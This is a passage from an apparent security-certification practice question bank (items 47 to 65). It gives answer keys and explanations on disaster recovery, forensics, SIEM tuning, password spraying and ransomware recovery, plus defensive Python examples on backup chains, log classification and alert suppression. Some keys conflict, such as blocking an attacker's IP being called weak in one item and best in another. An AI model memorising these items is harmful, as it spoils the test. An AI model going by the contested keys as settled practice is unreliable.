A SIEM aggregates and correlates logs from multiple sources (e.g., firewalls, servers, IDS) in near real time, enabling detection of anomalous patterns indicative of unauthorized access. It provides centralized visibility and alerting that can identify a breach even when individual logs appear benign. An IDS complements it by inspecting network traffic or host activity directly against signatures and anomaly baselines, raising an alert on suspicious access attempts as they happen.

Exam trap

The trap here is that candidates confuse vulnerability scanning (proactive) with intrusion detection (reactive), or assume antivirus covers network-level threats, when in fact neither provides real-time monitoring of network access attempts.

47
Multi-Selecteasy

Which TWO of the following are key elements of a disaster recovery plan (DRP)?

Select 2 answers
A.Communication and notification procedures
B.Standard operating procedures for daily tasks
C.Patch management schedules
D.Recovery priorities and order of restoration
E.Business impact analysis (BIA) results
AnswersA, D

Essential for coordinating recovery.

Why this answer

A and D are correct. A is correct because a DRP must include communication procedures to notify stakeholders. D is correct because the DRP should outline the order in which systems are restored (recovery priorities).

B is incorrect because the DRP is not focused on daily operations but on recovery. C is incorrect because patch management is part of ongoing maintenance, not recovery. E is incorrect because the BIA itself is a separate deliverable, although its outputs inform the recovery priorities in the DRP.

48
MCQmedium

During an incident, a forensic analyst needs to preserve volatile data from a live Windows server. Which command should be used first to collect memory and network connection information?

A.Run ipconfig /all
B.Run tasklist /v
C.Use a forensic tool to capture the contents of RAM
D.Perform a clean shutdown
AnswerC

Memory is the most volatile data.

Why this answer

Option C is correct because volatile data, such as the contents of RAM, is lost when the system is powered off. Capturing RAM first preserves critical evidence like running processes, network connections, and encryption keys. Network connection information can be extracted from the memory dump, so a dedicated forensic tool (e.g., FTK Imager, WinPmem) is the priority before any command-line queries that alter system state.

Exam trap

The trap here is that candidates often choose ipconfig or tasklist because they are familiar Windows commands, but they fail to recognize that these commands do not capture the most volatile data (RAM) and can alter the system state, violating the order of volatility.

How to eliminate wrong answers

Option A is wrong because ipconfig /all only displays network configuration (addresses, DNS servers, adapters) and captures neither memory contents nor active connections; running it also touches the live system before the memory image has been taken. Option B is wrong because tasklist /v lists running processes but does not capture memory contents or network connections, and like any tool launched on the host it changes the very memory being preserved. Option D is wrong because performing a clean shutdown destroys all volatile data in RAM, including network connections and process information, which is the opposite of preservation.

49
MCQmedium

Refer to the exhibit. What type of attack is indicated by the logs?

A.Malware infection
B.Privilege escalation
C.Denial of service
D.Brute force attack on root
AnswerD

Multiple failed root logins from same IP.

Why this answer

The logs show repeated SSH authentication attempts with the username 'root' from the same source IP, incrementing the failed password count until success is recorded. This pattern of sequential login attempts against a single privileged account is the hallmark of a brute force attack targeting the root user.

Exam trap

The trap here is that candidates may confuse a brute force attack with a denial of service because repeated failed logins can appear to 'overwhelm' the authentication system, but the key differentiator is the intent and pattern—guessing credentials versus exhausting resources.

How to eliminate wrong answers

Option A is wrong because malware infection would typically show indicators like file downloads, unusual process execution, or outbound connections to command-and-control servers, not repeated authentication attempts. Option B is wrong because privilege escalation involves an authenticated user gaining higher privileges than authorized, whereas these logs show failed logins before any successful authentication occurs. Option C is wrong because a denial of service attack would aim to overwhelm the service or system, not systematically attempt to guess credentials; the logs show normal SSH session establishment and teardown, not resource exhaustion.

50
Multi-Selectmedium

Which TWO of the following are key principles for designing an effective Security Operations Center (SOC)?

Select 2 answers
A.Applying least privilege to all user accounts
B.Ensuring separation of duties among analysts
C.Using defense-in-depth strategies across layers
D.Automating routine investigation tasks
E.Implementing centralized logging for all devices
AnswersB, C

Separation of duties prevents conflict of interest and reduces collusion risk.

Why this answer

Option B (separation of duties) and Option C (defense in depth) are correct because they remove single points of failure in both the analyst workflow and the technical controls, giving the SOC layered protection. Option E (centralized logging) is an important capability, but it is an implementation choice rather than a design principle; Option A (least privilege) is an access-control principle applied to accounts, not a SOC design principle as such; Option D (automation) is a tactic, not a core principle.

51
Multi-Selectmedium

Which THREE of the following are valid methods for securely disposing of magnetic hard drives?

Select 3 answers
A.Deleting files and emptying recycle bin
B.Physical shredding
C.Overwriting with random data (multiple passes)
D.Degaussing
E.Quick formatting
AnswersB, C, D

Destroys platters.

Why this answer

Physical shredding (B) destroys the platters, making data recovery impossible regardless of the magnetic state. This is a valid method for secure disposal because it physically prevents any read/write head from accessing the data.

Exam trap

The trap here is that candidates often confuse logical deletion (A, E) with secure erasure. Deleting files or quick-formatting only removes directory entries and leaves the data on the platters, whereas overwriting, degaussing and physical destruction all render it irrecoverable; of the three, only degaussing and destruction still work on a drive that no longer functions.

52
MCQhard

An organization's backup strategy includes daily full backups and hourly incremental backups. The system suffers a ransomware attack that encrypts all data. Which backup set is essential to restore the most recent clean state?

A.The last full backup plus all incremental backups after that
B.The last full backup plus the last incremental backup
C.The last full backup only
D.The last incremental backup only
AnswerA

Provides the most recent clean state by applying all increments.

Why this answer

To restore the most recent clean state after a ransomware attack, you need the last full backup as the base and all subsequent incremental backups to apply every change made up to the moment before the attack. Incremental backups capture only data changed since the last backup (full or incremental), so skipping any breaks the chain and results in data loss. Option A correctly includes the full backup and every incremental backup after it, ensuring a complete restoration to the latest point before encryption. In practice the chain is replayed only up to the last increment taken before the encryption began; any increment captured after that point contains encrypted files and must be left out.

Exam trap

The trap here is that candidates confuse incremental backups with differential backups, mistakenly thinking only the last incremental is needed, when in fact incremental backups require the entire chain from the last full backup to restore completely.

How to eliminate wrong answers

Option B is wrong because it omits all intermediate incremental backups between the last full and the last incremental, which would leave the restored data missing changes from those skipped intervals, resulting in an incomplete state. Option C is wrong because a full backup alone restores only the data as of its creation time, losing all changes made by subsequent hourly increments, which is far from the most recent clean state. Option D is wrong because an incremental backup contains only changes since the last backup and cannot be restored without its base full backup and all prior increments in the chain; applying it alone would fail due to missing parent data.
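The chain logic is easier to trust once you have watched it fail. The block below is an added example, not code from the original question set: it models a tiny file share with hourly snapshots, takes a full backup plus hourly incrementals (and differentials for comparison), and shows that a restore needs every link up to the last pre-attack increment, that replaying the post-attack increment reintroduces the encrypted files, and that a differential needs only the full backup plus itself. The files, timestamps and the 02:30 ransomware event are constructed assumptions.

```python
"""Full + incremental restore chain: every link matters, and so does the cutoff.

Added example for the backup question above; it is not code from the original
page. The file share, the hourly snapshots and the 02:30 'ransomware' event
are constructed for illustration.
"""
from datetime import datetime, timedelta

T0 = datetime(2024, 5, 1, 0, 0)                     # time of the daily full backup
HOUR = timedelta(hours=1)
ATTACK_TS = T0 + timedelta(hours=2, minutes=30)    # assumed encryption start


class ChainBroken(Exception):
    """Raised when a backup's baseline is not the state just rebuilt."""


def diff(before, after):
    """Files added/changed since `before`, and names deleted since `before`."""
    changed = {n: d for n, d in after.items() if before.get(n) != d}
    deleted = {n for n in before if n not in after}
    return changed, deleted


def take_backup(kind, ts, baseline, baseline_ts, current):
    changed, deleted = diff(baseline, current)
    return {"kind": kind, "ts": ts, "base_ts": baseline_ts,
            "changed": changed, "deleted": deleted}


def restore(full, later_backups, cutoff=None):
    """Replay the full backup, then each later backup taken before `cutoff`.

    Works for an incremental chain (each links to the previous backup) and for
    a single differential (links directly to the full). A missing link raises
    ChainBroken instead of silently producing an incomplete restore.
    """
    state, state_ts = dict(full["changed"]), full["ts"]
    for b in sorted(later_backups, key=lambda b: b["ts"]):
        if cutoff is not None and b["ts"] >= cutoff:
            break                       # anything at or after the attack is tainted
        if b["base_ts"] != state_ts:
            raise ChainBroken(f"{b['kind']} at {b['ts']:%H:%M} expects baseline "
                              f"{b['base_ts']:%H:%M}, but we are at {state_ts:%H:%M}")
        state.update(b["changed"])
        for n in b["deleted"]:
            state.pop(n, None)
        state_ts = b["ts"]
    return state


def build_timeline():
    """Hourly snapshots of a tiny share; ransomware encrypts it at 02:30."""
    s = {"ledger.db": "v1", "report.docx": "draft1", "notes.txt": "hello"}
    snaps = {T0: dict(s)}
    s["report.docx"] = "draft2"
    snaps[T0 + HOUR] = dict(s)
    s["ledger.db"] = "v2"
    del s["notes.txt"]
    snaps[T0 + 2 * HOUR] = dict(s)
    s = {n + ".locked": "ENCRYPTED" for n in s}   # the 03:00 increment sees this
    snaps[T0 + 3 * HOUR] = dict(s)
    return snaps


def make_backups(snaps):
    """One full at T0, then hourly incrementals and (for comparison) differentials."""
    times = sorted(snaps)
    full = take_backup("full", times[0], {}, None, snaps[times[0]])
    incs, diffs, prev = [], [], times[0]
    for ts in times[1:]:
        incs.append(take_backup("incremental", ts, snaps[prev], prev, snaps[ts]))
        diffs.append(take_backup("differential", ts, snaps[times[0]], times[0], snaps[ts]))
        prev = ts
    return full, incs, diffs


def demo():
    full, incs, diffs = make_backups(build_timeline())
    clean = restore(full, incs, cutoff=ATTACK_TS)            # full + 01:00 + 02:00
    tainted = restore(full, incs)                             # also replays 03:00
    last_diff = max((d for d in diffs if d["ts"] < ATTACK_TS), key=lambda d: d["ts"])
    via_diff = restore(full, [last_diff], cutoff=ATTACK_TS)  # full + one differential
    try:
        restore(full, incs[1:], cutoff=ATTACK_TS)             # 01:00 increment missing
        broken = None
    except ChainBroken as e:
        broken = str(e)
    return clean, tainted, via_diff, broken


if __name__ == "__main__":
    for label, value in zip(("clean", "tainted", "via_diff", "broken"), demo()):
        print(label, value)
```

The `base_ts` check is the practical takeaway: a real restore job should refuse to apply an increment whose parent is missing rather than produce a share that looks complete and is not.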

53
MCQhard

An organization uses a SIEM to collect logs from multiple sources. The security team notices that some events are missing during peak traffic hours. Analysis shows that the log sources are sending data via UDP. What is the most likely cause?

A.Clock skew between sources and SIEM
B.Insufficient SIEM storage capacity
C.UDP packet loss
D.Network bandwidth saturation
AnswerC

UDP does not guarantee delivery; packets can be lost.

Why this answer

UDP is a connectionless, best-effort transport protocol that does not guarantee delivery. During peak traffic hours, network congestion can cause UDP datagrams to be dropped without any retransmission mechanism, leading to missing events in the SIEM. This is the most direct and likely cause given the scenario. The usual fix is to move log forwarding to TCP (or TLS-wrapped syslog), so that a delivery problem shows up as a connection error rather than as silent loss.

Exam trap

The trap here is that candidates may incorrectly attribute missing events to storage or bandwidth issues, but the question specifically highlights UDP as the transport, which directly implies packet loss due to the protocol's lack of reliability.

How to eliminate wrong answers

Option A is wrong because clock skew would cause timestamp misalignment, not event loss; NTP synchronization is the standard remedy. Option B is wrong because insufficient SIEM storage would cause older data to be rotated out or ingestion to stop, not selective loss during peak hours. Option D is wrong because network bandwidth saturation could cause packet loss, but the specific mention of UDP points to the protocol's lack of reliability as the root cause; bandwidth saturation alone would affect TCP and UDP equally, but TCP would retransmit lost segments.

54
MCQhard

An organization with 500 employees operates a hybrid infrastructure with on-premises Active Directory and cloud-based services (Office 365, Azure). The security team receives an alert from the SIEM showing a high number of failed login attempts for a service account named 'svc_backup' from an external IP address. The account has delegated permissions to back up all domain controllers. The attempts are ongoing and fall below the lockout threshold to avoid detection. The team suspects a targeted password spraying attack. The helpdesk reports no recent password changes for this account. The incident response plan requires containment within 15 minutes. The cloud services are integrated with AD via Azure AD Connect. Which of the following actions BEST contains the attack while minimizing operational impact?

A.Block the external IP address at the firewall.
B.Configure Azure AD Conditional Access to require MFA for the account.
C.Disable the svc_backup account in Active Directory and notify the backup team to use an alternate account.
D.Immediately change the password of the svc_backup account.
AnswerC

Directly stops all authentication attempts; least operational impact until a secure replacement is created.

Why this answer

Option C is correct because disabling the compromised service account in Active Directory immediately stops the ongoing password spraying attack, preventing further unauthorized access attempts. This action contains the threat within the 15-minute containment window while minimizing operational impact, as the backup team can switch to an alternate account without disrupting critical backup operations. Disabling the account is faster and more reliable than changing the password, which might not propagate immediately to all domain controllers and cloud services via Azure AD Connect.

Exam trap

The trap here is that candidates may choose to change the password (Option D) thinking it is the fastest containment action, but they overlook the synchronization delay in hybrid environments and the risk of breaking automated processes, whereas disabling the account is the definitive containment step per incident response best practices.

How to eliminate wrong answers

Option A is wrong because blocking the external IP address at the firewall is a temporary measure that does not address the root cause; the attacker can easily switch to a different IP address or proxy, and the compromised account remains active and vulnerable. Option B is wrong because configuring Azure AD Conditional Access to require MFA for the account does not stop the ongoing attack against on-premises Active Directory; the password spraying attempts are targeting the on-premises service account, not cloud authentication, and MFA enforcement would not apply to NTLM or Kerberos authentication used for backup operations. Option D is wrong because immediately changing the password may not propagate quickly enough to all domain controllers and Azure AD via Azure AD Connect (the default delta sync cycle is 30 minutes, and password hash synchronization runs on its own separate two-minute cycle rather than instantly), leaving a window for the attacker to continue; additionally, changing the password could break automated backup scripts that rely on the current password, causing operational disruption.

55
MCQhard

A security analyst observes repeated failed logon attempts from a single IP address against a domain controller. The account lockout policy is set to 5 attempts within 30 minutes. However, after the account is locked, the attack switches to a different username. Which type of attack is most likely occurring?

A.Password spraying attack
B.Brute-force attack
C.Dictionary attack
D.Rainbow table attack
AnswerA

Password spraying tries common passwords across many accounts.

Why this answer

This is a password spraying attack because the attacker attempts a small set of common passwords against many usernames, avoiding account lockout by not exceeding the threshold for any single account. The observed behavior—repeated failed attempts from one IP, then switching usernames after lockout—matches the pattern of password spraying, where the attacker tries one or a few passwords across many accounts rather than many passwords against one account.

Exam trap

The trap here is that candidates confuse password spraying with brute-force or dictionary attacks, failing to recognize that the key differentiator is the attacker's strategy of targeting multiple usernames with a few passwords to evade account lockout thresholds.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because a brute-force attack tries many passwords against a single username, which would quickly trigger the account lockout policy and not involve switching usernames. Option C (Dictionary attack) is wrong because a dictionary attack uses a list of likely passwords against a single account, again focusing on one username and leading to lockout, not switching targets. Option D (Rainbow table attack) is wrong because rainbow tables are used to crack password hashes offline, not for online authentication attempts against a live domain controller.
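The two patterns contrasted here, and the root brute force in the earlier SSH exhibit, come apart cleanly once failed logons are grouped by source and by username. The block below is an added example covering both questions, not code from the original question set: it parses OpenSSH-style authentication lines, counts failures per (source, user), and reports whether a source is brute-forcing one account, spraying many accounts, or is just a user who mistyped a password, along with any account that logged in successfully after failures. The hosts, addresses, usernames and thresholds are constructed assumptions.

```python
"""Brute force vs. password spraying from sshd authentication logs.

Added example covering both the 'brute force on root' exhibit and the
password-spraying question; it is not code from the original page. The
log lines, host name, addresses and thresholds are constructed assumptions.
"""
import re
from collections import defaultdict

# OpenSSH's 'Failed/Accepted password for [invalid user] NAME from IP port N'.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth(lines):
    """Yield (source_ip, username, succeeded) for each recognised line."""
    for line in lines:
        m = AUTH_RE.search(line)
        if m:
            yield m["ip"], m["user"], m["result"] == "Accepted"


def classify_auth(lines, brute_threshold=5, spray_min_users=5, lockout=5):
    """Per source IP: brute_force, password_spray, or low_volume.

    Breadth decides first: many distinct usernames from one IP is spraying,
    whether each account stays under the lockout threshold or (as in the
    question) hits it and the attacker moves on. Depth decides next: many
    failures against one account is brute force.
    """
    failures = defaultdict(lambda: defaultdict(int))   # ip -> user -> failed count
    succeeded_after = defaultdict(set)                 # ip -> users that then logged in
    for ip, user, ok in parse_auth(lines):
        if ok:
            if ip in failures and failures[ip].get(user, 0) > 0:
                succeeded_after[ip].add(user)
        else:
            failures[ip][user] += 1

    report = {}
    for ip, per_user in failures.items():
        if not per_user:
            continue
        worst = max(per_user.values())
        users = len(per_user)
        if users >= spray_min_users:
            kind = "password_spray"
        elif worst >= brute_threshold:
            kind = "brute_force"
        else:
            kind = "low_volume"
        report[ip] = {
            "kind": kind,
            "users": users,
            "max_failures_per_user": worst,
            "under_lockout": worst < lockout,
            "succeeded_after_failures": sorted(succeeded_after[ip]),
        }
    return report


def build_sample():
    """Constructed sshd lines: a brute force on root, a spray across eight
    users, and one user who mistyped a password once."""
    lines = []
    for i in range(12):                     # 12 failures for root, then success
        lines.append(f"May  1 10:00:{i:02d} bastion sshd[{1000 + i}]: Failed password "
                     f"for root from 203.0.113.5 port {40000 + i} ssh2")
    lines.append("May  1 10:00:13 bastion sshd[1013]: Accepted password for root "
                 "from 203.0.113.5 port 40013 ssh2")
    users = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]
    for n, u in enumerate(users):           # 4 tries each, staying under lockout
        inv = "invalid user " if u in ("dave", "heidi") else ""
        for i in range(4):
            lines.append(f"May  1 10:05:{n:02d} bastion sshd[{2000 + n}]: Failed password "
                         f"for {inv}{u} from 198.51.100.23 port {50000 + i} ssh2")
    lines.append("May  1 10:10:00 bastion sshd[3000]: Failed password for mallory "
                 "from 192.0.2.44 port 60000 ssh2")
    lines.append("May  1 10:10:07 bastion sshd[3000]: Accepted password for mallory "
                 "from 192.0.2.44 port 60000 ssh2")
    return lines


if __name__ == "__main__":
    for ip, info in classify_auth(build_sample()).items():
        print(ip, info)
```

`succeeded_after_failures` is the field worth alerting on by itself: a success that follows a run of failures from the same source is the moment a guessing attack turned into a compromise, which is exactly what the root exhibit shows.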

56
Multi-Selecthard

Which TWO of the following are essential components of a successful security awareness program?

Select 2 answers
A.Metrics to measure the program's effectiveness
B.Implementation of technical controls like antivirus
C.Annual one-time training sessions
D.Punitive measures for security violations
E.Regular, engaging, and role-specific training
AnswersA, E

Measuring outcomes (e.g., phishing test results) allows refinement of the program.

Why this answer

Metrics to measure the program's effectiveness (Option A) are essential because they provide quantifiable data—such as phishing click rates, incident reporting trends, and policy violation statistics—that allow the organization to evaluate whether the awareness program is changing behavior and reducing risk. Without metrics, the program cannot be improved or justified to stakeholders, making it a core component of a successful security awareness initiative.

Exam trap

ISC2 often tests the misconception that technical controls or punitive measures are part of a security awareness program, when in fact the program is purely about human-focused education and behavior change, not technology enforcement or punishment.

57
Multi-Selectmedium

Which TWO of the following are essential components of a disaster recovery plan? (Choose two.)

Select 2 answers
A.Recovery Point Objective (RPO)
B.Business continuity plan
C.Recovery Time Objective (RTO)
D.Service Level Agreement (SLA)
E.Cold site configuration
AnswersA, C

Defines acceptable data loss in terms of time.

Why this answer

Options A and C are correct. Recovery Time Objective (RTO) and Recovery Point Objective (RPO) are key metrics. Business continuity plan is a separate but related plan; cold sites and SLAs are not components of a DRP itself.

58
MCQeasy

Which of the following is a primary purpose of conducting a tabletop exercise for incident response?

A.Measure the effectiveness of backup restoration.
B.Validate communication and decision-making processes.
C.Test technical capabilities of security tools.
D.Identify unpatched vulnerabilities in systems.
AnswerB

Focuses on team coordination and escalation paths.

Why this answer

A tabletop exercise is a discussion-based session where participants walk through a simulated incident scenario to evaluate the effectiveness of communication channels, decision-making hierarchies, and coordination among stakeholders. It does not involve live systems or technical testing, so its primary purpose is to validate the procedural and human elements of the incident response plan, such as who notifies whom and how escalation decisions are made.

Exam trap

The trap here is that candidates confuse a tabletop exercise with a technical drill or live-fire exercise, mistakenly thinking it tests tool capabilities or system-level actions, when in fact it strictly evaluates human processes and communication workflows.

How to eliminate wrong answers

Option A is wrong because measuring backup restoration effectiveness requires a hands-on technical test (e.g., a recovery drill or restore validation), not a discussion-based tabletop exercise. Option C is wrong because testing technical capabilities of security tools (e.g., SIEM rule tuning or firewall ACLs) demands live execution or simulation in a lab environment, not a walkthrough. Option D is wrong because identifying unpatched vulnerabilities is the domain of vulnerability scanning (e.g., using Nessus or OpenVAS) or penetration testing, not a tabletop exercise which focuses on process and communication.

59
MCQmedium

A security analyst notices that the SIEM is generating an overwhelming number of low-priority alerts from a single application server. The server is critical to operations. What is the BEST approach to reduce noise without compromising security?

A.Increase the severity threshold for that server's alerts.
B.Disable all alerts from that server.
C.Create a suppression rule for known benign patterns.
D.Exclude the server from SIEM monitoring.
AnswerC

Suppresses known benign events while keeping alerting for unusual activity.

Why this answer

Option C is correct because suppression rules allow the SIEM to filter out known benign patterns (e.g., routine service checks or scheduled scans) while still capturing genuine threats. This reduces alert fatigue without disabling monitoring for the critical server, preserving visibility into anomalous or malicious activity.

Exam trap

The trap here is that candidates confuse 'reducing noise' with 'reducing monitoring,' leading them to choose threshold increases or outright exclusion, when the correct approach is to surgically filter known benign events while maintaining full detection coverage.

How to eliminate wrong answers

Option A is wrong because increasing the severity threshold would cause the SIEM to ignore all low-severity alerts, potentially missing early indicators of compromise (e.g., reconnaissance or privilege escalation attempts) that often start as low-priority events. Option B is wrong because disabling all alerts from a critical server creates a complete blind spot, violating the principle of defense in depth and allowing attacks to go undetected. Option D is wrong because excluding the server from SIEM monitoring removes all visibility into its security posture, which is unacceptable for a critical asset and contradicts the core purpose of a SIEM.
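The difference between a suppression rule and a severity threshold is concrete enough to show in code. The block below is an added example, not code from the original question set: it applies host-scoped, pattern-matched suppression rules that carry an owner and an expiry, counts what they suppress instead of discarding it, and contrasts that with the blunt threshold from option A, which throws away a low-severity failed-logon alert along with the noise. The alerts, host name, rule and expiry are constructed assumptions; real SIEMs express the same idea in their own rule syntax.

```python
"""Surgical alert suppression versus a blunt severity threshold.

Added example for the alert-noise question above; it is not code from the
original page. The alerts, host name, rule name and expiry are constructed
assumptions.
"""
import re
from collections import Counter
from datetime import datetime, timedelta

SEVERITY = {"low": 1, "medium": 2, "high": 3}


class SuppressionRule:
    """Suppress alerts from one host whose message matches a known-benign pattern.

    Every rule carries an owner and an expiry so the exception gets reviewed
    instead of becoming a permanent blind spot.
    """

    def __init__(self, name, host, pattern, owner, expires):
        self.name, self.host, self.owner, self.expires = name, host, owner, expires
        self.pattern = re.compile(pattern)

    def matches(self, alert):
        return (alert["host"] == self.host
                and alert["ts"] < self.expires
                and self.pattern.search(alert["message"]) is not None)


def triage(alerts, rules):
    """Return (alerts that still reach an analyst, suppressed count per rule).

    Suppressed alerts are counted rather than dropped, so a sudden jump in a
    'benign' pattern's volume is itself visible to whoever tunes the rules.
    """
    passed, suppressed = [], Counter()
    for alert in alerts:
        rule = next((r for r in rules if r.matches(alert)), None)
        if rule is None:
            passed.append(alert)
        else:
            suppressed[rule.name] += 1
    return passed, suppressed


def severity_threshold(alerts, minimum="medium"):
    """The blunt alternative (option A): drop everything below a severity."""
    floor = SEVERITY[minimum]
    return [a for a in alerts if SEVERITY[a["severity"]] >= floor]


def build_alerts():
    """Constructed alert stream from the critical server app01."""
    base = datetime(2024, 5, 1, 10, 0)
    alerts = [{"ts": base + timedelta(seconds=10 * i), "host": "app01",
               "severity": "low",
               "message": "Scheduled health check: GET /healthz returned 200"}
              for i in range(30)]
    alerts.append({"ts": base + timedelta(minutes=2), "host": "app01",
                   "severity": "low",
                   "message": "Failed logon for user svc_app from 10.0.0.5"})
    alerts.append({"ts": base + timedelta(minutes=3), "host": "app01",
                   "severity": "medium",
                   "message": "New scheduled task created: updater"})
    alerts.append({"ts": base + timedelta(hours=2), "host": "app01",
                   "severity": "low",
                   "message": "Scheduled health check: GET /healthz returned 200"})
    return alerts


RULES = [
    SuppressionRule(
        name="app01-healthz", host="app01",
        pattern=r"^Scheduled health check: GET /healthz returned 200$",
        owner="platform-team",
        expires=datetime(2024, 5, 1, 11, 0),   # deliberately short for the example
    ),
]


if __name__ == "__main__":
    passed, suppressed = triage(build_alerts(), RULES)
    print("reaching analysts:", [a["message"] for a in passed])
    print("suppressed:", dict(suppressed))
    print("after blunt threshold:",
          [a["message"] for a in severity_threshold(build_alerts())])
```

Note that the anchored pattern only swallows the exact benign message, and that the health-check alert after the rule's expiry is surfaced again: both are deliberate, so that a suppression rule cannot quietly grow into the blind spot of options B and D.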

60
MCQhard

Your organization, a multinational e-commerce company, has suffered a ransomware attack that encrypted critical database servers and file shares. The ransom note demands payment in cryptocurrency within 48 hours or the data will be permanently destroyed. The company has a backup strategy that includes daily full backups and hourly incremental backups, stored both on-site and off-site. However, during the incident response, you discover that the most recent on-site backups are also encrypted because the backup server was connected to the network and affected by the same ransomware. Off-site backups are on tape and were last rotated out 72 hours ago. The CEO is pressuring to pay the ransom to restore operations quickly. Which option should the incident response team prioritize to minimize data loss and reputational damage?

A.Pay the ransom and hope the attackers provide a working decryption key.
B.Restore data from the off-site tape backups taken 72 hours ago.
C.Rebuild servers from scratch using latest known good configurations without restoring data.
D.Attempt to negotiate with the attackers for a lower ransom and more time.
AnswerB

Off-site backups are isolated and not encrypted; 72-hour data loss is acceptable compared to paying ransom.

Why this answer

Option B is correct: restoring from the off-site tapes (72 hours old) is the best course because they were isolated from the network, are not encrypted, and provide a known clean recovery point. Before restoring, confirm the tapes predate the intrusion and restore onto rebuilt hosts so the ransomware is not reintroduced. Option A (pay the ransom) is risky: there is no guarantee of a working decryption key, and payment funds and encourages further attacks. Option D (negotiate) wastes time inside the 48-hour window.

Option C (rebuild without restoring data) is too slow and abandons all the data the tapes could have recovered.

61
MCQeasy

An organization needs to ensure that backup tapes containing sensitive data are protected during transportation between sites. What is the most effective control?

A.Applying tamper-evident seals
B.Encrypting the backup tapes
C.Using a chain of custody log
D.Using a bonded courier service
AnswerB

Encryption keeps the data unreadable wherever the tape travels.

Why this answer

Encrypting the backup tapes ensures that even if the physical media is lost, stolen, or intercepted during transit, the sensitive data remains unreadable without the decryption key. This provides a strong, data-centric security control that protects confidentiality regardless of the physical security measures in place. Encryption is the most effective control because it directly addresses the risk of unauthorized access to the data itself.

Exam trap

The trap here is that candidates often choose a physical security control (like tamper-evident seals or bonded couriers) thinking it is sufficient, but the CISSP exam emphasizes that data-centric controls (encryption) are the most effective for protecting data in transit, as physical controls can be bypassed or fail.

How to eliminate wrong answers

Option A is wrong because tamper-evident seals only indicate whether the tape has been physically opened or tampered with; they do not protect the data from being read if the seal is bypassed or the tape is accessed through other means. Option C is wrong because a chain of custody log provides an audit trail of who handled the tape and when, but it does not prevent unauthorized access to the data if the tape is lost or stolen. Option D is wrong because a bonded courier service reduces the risk of theft or loss during transit, but it does not protect the data if the courier is compromised or the tape is intercepted; encryption is still needed to ensure confidentiality.

62
MCQeasy

You are the lead security analyst at a mid-sized financial services firm. At 2:15 PM, the SIEM alerts on multiple failed login attempts from an external IP address against the VPN gateway. The attempts stopped at 2:20 PM, but at 2:30 PM, a user reports that their account was used to send a phishing email to internal employees. You confirm that the user's account has been compromised. The CEO asks for an immediate update. What should be your FIRST action according to the incident response framework your company follows (based on NIST SP 800-61)?

A.Preserve forensic evidence by creating a disk image of the user's workstation.
B.Validate the incident and assess its scope and impact.
C.Immediately notify the legal and compliance teams.
D.Isolate the compromised workstation from the network.
AnswerB

Validation ensures it is a real incident; assessment prioritizes response.

Why this answer

According to NIST SP 800-61, the first phase of incident response is preparation, followed by detection and analysis. The SIEM alert and user report indicate a potential incident, but you must first validate the incident and assess its scope and impact before taking containment, eradication, or recovery actions. This ensures that resources are not wasted on a false positive and that the response is proportional to the actual threat.

Exam trap

The trap here is that candidates confuse containment actions (like isolation) with the first step, but NIST SP 800-61 places detection and analysis (validating the alert and scoping the incident) before containment, eradication, and recovery, so that the response is proportionate and not needlessly disruptive.

How to eliminate wrong answers

Option A is wrong because preserving forensic evidence (e.g., creating a disk image) is a step that occurs after the incident has been validated and scoped; performing it prematurely could waste resources if the incident is a false positive or if the scope extends beyond that single workstation. Option C is wrong because notifying legal and compliance teams is a communication step that typically follows validation and initial containment, not the first action; immediate notification without confirmed scope could cause unnecessary escalation or legal exposure. Option D is wrong because isolating the compromised workstation is a containment action that should be taken after the incident is validated and its scope assessed; premature isolation could disrupt business operations or alert an attacker before full understanding of the incident.

63
MCQeasy

A security analyst detects repeated failed login attempts from a single external IP address targeting a user account. What is the best IMMEDIATE action?

A.Investigate the source IP's history
B.Block the IP address at the perimeter firewall
C.Disable the targeted user account
D.Enable account lockout after three failures
AnswerB

Immediately stops the attack.

Why this answer

Blocking the IP address at the perimeter firewall is the best immediate action because it stops the ongoing brute-force attack at the network boundary, preventing further authentication attempts without affecting the legitimate user's access. This aligns with the principle of containment in incident response, prioritizing rapid mitigation over investigation or configuration changes that could delay the response.

Exam trap

The trap here is that candidates confuse 'immediate action' with 'long-term fix' and choose to investigate the IP (A) or implement a policy change (D), failing to recognize that containment (B) must come first in the incident response process.

How to eliminate wrong answers

Option A is wrong because investigating the source IP's history is a forensic step that should follow containment, not precede it; delaying action allows the attack to continue. Option C is wrong because disabling the targeted user account would deny service to the legitimate user and does not address the external threat, which could simply pivot to another account. Option D is wrong because enabling account lockout after three failures is a preventive configuration change that takes time to implement and does not stop the current attack in progress; it also risks locking out the legitimate user if the attacker triggers the threshold.

64
MCQhard

A SOC analyst receives an alert for a suspicious outbound connection from a server in the DMZ to an external IP on port 443. The server is a web application server that should only communicate internally. The analyst checks the process and finds it is 'svchost.exe' running from a non-standard path. What is the most appropriate immediate action?

A.Isolate the server from the network
B.Initiate a full incident response investigation
C.Disregard the alert because svchost.exe is a legitimate Windows process
D.Terminate the suspicious process
AnswerA

Isolation stops the malicious outbound connection and prevents further damage, allowing for later forensic analysis.

Why this answer

Option A is correct because isolating the server immediately contains the threat, preventing potential data exfiltration or lateral movement from a compromised host. The suspicious outbound connection from a DMZ server to an external IP on port 443 (HTTPS) combined with 'svchost.exe' running from a non-standard path strongly indicates malware masquerading as a legitimate Windows process. In security operations, containment is the priority before investigation to minimize damage.

Exam trap

The trap here is that candidates may think terminating the process (Option D) is sufficient, but incident response practice puts containment ahead of eradication to prevent further compromise; candidates may also trust svchost.exe as always legitimate without checking the path it runs from.

How to eliminate wrong answers

Option B is wrong because initiating a full incident response investigation without first containing the threat could allow the attacker to continue exfiltrating data or move laterally while the investigation proceeds; containment must come first. Option C is wrong because while svchost.exe is a legitimate Windows process, it should only run from C:\Windows\System32 or C:\Windows\SysWOW64, and a non-standard path is a classic indicator of malware impersonation; disregarding the alert would be negligent. Option D is wrong because terminating the suspicious process alone does not prevent the malware from restarting or other persistence mechanisms from activating, and it does not address the network-level threat; isolation is more comprehensive.

65
MCQeasy

Refer to the exhibit. The syslog-ng configuration is used to forward logs to a central server. What type of logs are being forwarded?

A.Authentication logs
B.Kernel logs
C.Daemon process logs
D.Security event logs
AnswerA

auth and authpriv are authentication-related.

Why this answer

